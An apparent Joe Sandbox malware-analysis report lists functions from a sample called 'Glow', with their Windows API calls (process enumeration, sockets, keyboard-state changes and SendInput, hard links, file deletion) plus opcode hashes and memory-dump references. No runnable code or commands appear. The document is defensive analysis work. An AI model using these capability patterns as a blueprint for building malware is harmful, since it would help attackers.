Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35872d1266c093123e76e83f16175967d8b6476de8d160a3468cbeba6a67fb91
Instruction ID: 8b5c5f1c46aeac4ea32cd41d80c8dd9f6bf7a8c5671971484292925e2d33ac77
Opcode Fuzzy Hash: 35872d1266c093123e76e83f16175967d8b6476de8d160a3468cbeba6a67fb91
Instruction Fuzzy Hash: A8C15D75A0026AEFCB09CF95C884AAEB7B5FF48704F218698E405DF291D771ED81CB90

Function 003B41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 003B427E
__alldvrm.LIBCMT ref: 003B447F
__alldvrm.LIBCMT ref: 003B44A1

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: f6c64dd636048223c067740540d5ea5b27d72b574d1c1632db71077bb4b17c15
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: C6A166359003869FDB13CF19C891BEEBBE4EF11318F1941ADE6998BA43C6348C51C758

Function 003E0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00420BD4,?), ref: 003E0EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00420BD4,?), ref: 003E0EF8
CLSIDFromProgID.OLE32(?,?,00000000,0041DCE0,000000FF,?,00000000,00000800,00000000,?,00420BD4,?), ref: 003E0F1D
_memcmp.LIBVCRUNTIME ref: 003E0F3E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: f8c5ef9c7650b60ffd1ff874feb27094e7b38c5f89d4fe852b0fa1d3c8385943
Instruction ID: f433af267d8029ba9b7b18b211a4199b6c0057e95cb420b04ff5389077e9ae11
Opcode Fuzzy Hash: f8c5ef9c7650b60ffd1ff874feb27094e7b38c5f89d4fe852b0fa1d3c8385943
Instruction Fuzzy Hash: A6813971A00119EFCB05DF94C884EEEB7B9FF89315F204598E506AB250DB71AE46CB60

Function 0040B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0040B10C
Process32FirstW.KERNEL32(00000000,?), ref: 0040B11A

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Process32NextW.KERNEL32(00000000,?), ref: 0040B1FC
CloseHandle.KERNEL32(00000000), ref: 0040B20B

Part of subcall function 0039E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,003C4D73,?), ref: 0039E395

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: b8030563ba1759d631aca8efec339adc378ed9398f81c9a1fbe2f0547503272d
Instruction ID: 08de07a5994e698833ac710e84479f7d70e04322589ac96aca902c332724b8d1
Opcode Fuzzy Hash: b8030563ba1759d631aca8efec339adc378ed9398f81c9a1fbe2f0547503272d
Instruction Fuzzy Hash: 42517EB1908301AFD311EF24C886A5BBBE8FF89754F40896DF5859B291EB34D904CB96

Function 003C1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003C1840

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d35af86dd6ad98a74fcfaf5ed503bc4da4679f9c76128d1c6f992400b654b59c
Instruction ID: d14915a807626d92069ce58a377938ba7502c2bbdf3987f0f527031fcf75570d
Opcode Fuzzy Hash: d35af86dd6ad98a74fcfaf5ed503bc4da4679f9c76128d1c6f992400b654b59c
Instruction Fuzzy Hash: 26412D316046006EDB237BF98C46FBE36A4EF47730F25462DF514DA1A3DA354C016761

Function 00402533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 0040255A
WSAGetLastError.WSOCK32 ref: 00402568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004025E7
WSAGetLastError.WSOCK32 ref: 004025F1

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 07408d99d18c71b48649c89f11e16c2085140f417714e773d7c9a7c28c37070a
Instruction ID: 1d6127fbf43e4bff1d25427c09fd2c0068792676c9b926ee6f153d2b25767115
Opcode Fuzzy Hash: 07408d99d18c71b48649c89f11e16c2085140f417714e773d7c9a7c28c37070a
Instruction Fuzzy Hash: 6641C674A00300AFE721AF24C88AF2677E5AB44714F54C498F91A9F3D2D7B6ED42CB94

Function 00416CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00416D1A
ScreenToClient.USER32(?,?), ref: 00416D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00416DBA

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 32120ed0bfc512a1c9610ab3a522cc62f82fa607e45ca7dad81eb50275103986
Instruction ID: c7c0fd26a766278ce81f57f254aedfbe5d77182032def60f91db7a824fb523b7
Opcode Fuzzy Hash: 32120ed0bfc512a1c9610ab3a522cc62f82fa607e45ca7dad81eb50275103986
Instruction Fuzzy Hash: 8E511B74A00209AFCF24DF68D9809EE7BB6EB45360F11816AF9159B390D774ED81CB54

Function 003BB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f886bdecfb87c0e38403978de422c0206269db93cc1ac4bda7ce94e66d5dfa
Instruction ID: f2fe73a4230331ae458e2744d9f6d53561c576f1f3366945e5c19c5fb85ea6b5
Opcode Fuzzy Hash: 25f886bdecfb87c0e38403978de422c0206269db93cc1ac4bda7ce94e66d5dfa
Instruction Fuzzy Hash: 0741DC71A00744AFD726AF78CC41BAAF7ADEB48714F10852EF251DF691DBB199418780

Function 003F611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003F61C8
GetLastError.KERNEL32(?,00000000), ref: 003F61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003F6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003F623F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 385a5c9674f0fdd37d65f4142c101c2b9b40e3e93387f10622697a0b38b682c2
Instruction ID: 383ebec11a5aad92502d48ffa6c3ddd85f7e117f8571502134e0a21c9b2d553c
Opcode Fuzzy Hash: 385a5c9674f0fdd37d65f4142c101c2b9b40e3e93387f10622697a0b38b682c2
Instruction Fuzzy Hash: 83411B39600614DFCB12EF15C545A5EBBE2EF89710B1984D8E95A9F362CB34FD01CB91

Function 003EB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 003EB473
SetKeyboardState.USER32(00000080), ref: 003EB48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 003EB4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 003EB54F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 597d87ad2fd4fddd4cb8f9113e5f9a1d273d6d6f7661a16bb90ab26ecaea2666
Instruction ID: 7b665dbc214b3c5ebbaa48467d38bbe0ecf91ec10938db61259550dfdb8fb0c1
Opcode Fuzzy Hash: 597d87ad2fd4fddd4cb8f9113e5f9a1d273d6d6f7661a16bb90ab26ecaea2666
Instruction Fuzzy Hash: A0314B70A406B86EFF33CB6788057FBFBB9AB45310F04831AE495561D2C37489458B95

Function 003EB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 003EB5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 003EB5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 003EB63B
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 003EB68D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: b328ff7a0de1568bcfe9f720117d1cad5f30033a5137195e28368829c789f154
Instruction ID: 93c1f80f07f715869fb4c474e996c1a5a1157a2cc037142bef8bc25924b4bb5f
Opcode Fuzzy Hash: b328ff7a0de1568bcfe9f720117d1cad5f30033a5137195e28368829c789f154
Instruction Fuzzy Hash: 0A313C70D406A8AEFF378B6688057FFFBA6BF85310F04832AE485561E1C3749A45CB95

Function 004180AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004180D4
GetWindowRect.USER32(?,?), ref: 0041814A
PtInRect.USER32(?,?,?), ref: 0041815A
MessageBeep.USER32(00000000), ref: 004181C6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9a14db07469a51e9479bff3c98514684d18171e4004546332983e3eea558f9eb
Instruction ID: 4d35fb99aa2b3cb0219f86d187d134faa44abbb8091bbff25ca3dabcd88b35c6
Opcode Fuzzy Hash: 9a14db07469a51e9479bff3c98514684d18171e4004546332983e3eea558f9eb
Instruction Fuzzy Hash: 5E41A072B00615EFCB11CF58C880AEA7BF5BF45314F1440AEE9449B361CB78E882CB88

Function 00412176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00412187

Part of subcall function 003E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E43AD
Part of subcall function 003E4393: GetCurrentThreadId.KERNEL32 ref: 003E43B4
Part of subcall function 003E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E2F00), ref: 003E43BB

GetCaretPos.USER32(?), ref: 0041219B
ClientToScreen.USER32(00000000,?), ref: 004121E8
GetForegroundWindow.USER32 ref: 004121EE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 3e68a24382667fba6fddb314efe81d9084bb4403d40582c4d5c39f47d3551155
Instruction ID: 9327bc2d74e82ed35a8be6bae01ae5a06615ee4020fed841f986d478d4a64b35
Opcode Fuzzy Hash: 3e68a24382667fba6fddb314efe81d9084bb4403d40582c4d5c39f47d3551155
Instruction Fuzzy Hash: 083143B5D00209AFC705EFA9C981CEEB7F8EF48304B5084AAE515EB251E675DE45CBA0

Function 003EE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF

_wcslen.LIBCMT ref: 003EE8E2
_wcslen.LIBCMT ref: 003EE8F9
_wcslen.LIBCMT ref: 003EE924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 003EE92F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 80ad61cd0cda56f9bf0bb5adf792b4e641704192e1c6092b7402ab8e95d7d5b8
Instruction ID: 4b170c20a122a9d91d54ea31a21b523657bb020eeea128c854042fd2cdd4894d
Opcode Fuzzy Hash: 80ad61cd0cda56f9bf0bb5adf792b4e641704192e1c6092b7402ab8e95d7d5b8
Instruction Fuzzy Hash: 6F21E571D00224AFCB12AFA4D981BAEB7F8EF46320F114165F804BF281D7749E41C7A1

Function 003EDB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0041DC30), ref: 003EDBA6
GetLastError.KERNEL32 ref: 003EDBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 003EDBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0041DC30), ref: 003EDC21

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: bb4434ae3e4590e424a0e9ca7b5c2ce0ee984951c65d95aafdebddd283fcf904
Instruction ID: 0c393d3144ddcf249549b6d8a8724571793948dd1f660b2933f33d8b29afac87
Opcode Fuzzy Hash: bb4434ae3e4590e424a0e9ca7b5c2ce0ee984951c65d95aafdebddd283fcf904
Instruction Fuzzy Hash: BE21A3705043159FC711EF25C98089BB7E8EF563A4F204B59F4A9C72E1D731D94ACB82

Function 0041321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 004132A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004132C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004132CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004132DC

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: b9036b66c146d2a7efb2816eb0d0ae70fa286054083b6ef18c443e4884ebb82c
Instruction ID: 80ef880fefaea5fa894ff0099186e59198aafdbc286e0c5e67b51ba8be75d804
Opcode Fuzzy Hash: b9036b66c146d2a7efb2816eb0d0ae70fa286054083b6ef18c443e4884ebb82c
Instruction Fuzzy Hash: 6221C431604111AFD715AF24C845FEA7B95FF81325F248299F8268B2D2C775ED81C7D8

Function 003E825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003E96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,003E8271,?,000000FF,?,003E90BB,00000000,?,0000001C,?,?), ref: 003E96F3
Part of subcall function 003E96E4: lstrcpyW.KERNEL32(00000000,?,?,003E8271,?,000000FF,?,003E90BB,00000000,?,0000001C,?,?,00000000), ref: 003E9719
Part of subcall function 003E96E4: lstrcmpiW.KERNEL32(00000000,?,003E8271,?,000000FF,?,003E90BB,00000000,?,0000001C,?,?), ref: 003E974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,003E90BB,00000000,?,0000001C,?,?,00000000), ref: 003E828A
lstrcpyW.KERNEL32(00000000,?,?,003E90BB,00000000,?,0000001C,?,?,00000000), ref: 003E82B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,003E90BB,00000000,?,0000001C,?,?,00000000), ref: 003E82EB

Strings

cdecl, xrefs: 003E82E2

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: c7e5a3be7a3f433c04d1917e33d74068eec434eca8e2868f3620253f9afc1a71
Instruction ID: 4ad4666b56c8f170f17d9d2ae5b583da842a9248a044d968fedc74d12fc8f3a0
Opcode Fuzzy Hash: c7e5a3be7a3f433c04d1917e33d74068eec434eca8e2868f3620253f9afc1a71
Instruction Fuzzy Hash: 4811267E600391AFCB169F39C845EBA77A9FF49750B10812AF946CB290EF319801C794

Function 004160FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 0041615A
_wcslen.LIBCMT ref: 0041616C
_wcslen.LIBCMT ref: 00416177
SendMessageW.USER32(?,00001002,00000000,?), ref: 004162B5

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: fb472581b2d2d024d03779e7e8837e2c0142f8ef9162cd38d56f5795895d0fec
Instruction ID: 2f1baeeb8367a833f27aefe8ddd94521cbeef18d98e065d6120ade627d54f30a
Opcode Fuzzy Hash: fb472581b2d2d024d03779e7e8837e2c0142f8ef9162cd38d56f5795895d0fec
Instruction Fuzzy Hash: D111D675600208A6DB10DF648C84AEF777CEB51354B10412BF915D5282E7B8C981CB69

Function 003B2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

